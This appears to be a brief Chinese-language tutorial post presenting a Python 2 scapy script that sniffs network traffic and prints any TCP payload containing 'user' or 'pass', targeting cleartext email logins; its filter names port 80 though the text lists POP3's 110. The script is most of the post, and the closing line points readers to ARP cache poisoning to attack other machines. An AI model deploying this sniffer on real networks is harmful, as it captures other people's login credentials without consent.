唯一目的:短平快
语言:python
模块:scapy
常见的电子邮件端口有三个:
110端口:POP3
143端口:IMAP
2 5 端口:SMTP
#coding=utf-8
from scapy.all import *
#def packet_callback(packet):
# print packet.show()
#sniff(prn=packet_callback,count=1)
def packet_callback(packet):
if packet[TCP].payload: #如果TCP数据包有内容
mail_packet = str(packet[TCP].payload) #就把数据包内容赋给前面的变量
if "user" in mail_packet.lower() or "pass" in mail_packet.lower(): #如果user和pass在数据包里面
print "[*] server: %s " % packet[IP].dst #把他们处理后显示出来
print "[*] %s" % packet[TCP].payload #同时显示出所有的数据包
sniff(filter="tcp port 80 or tcp port 25 or tcp port 143",prn=packet_callback,store=0)
当然,这个代码片只能嗅探自己电脑的信息,要想攻击其他机器,请看下一章:
scapy–ARP缓存投毒!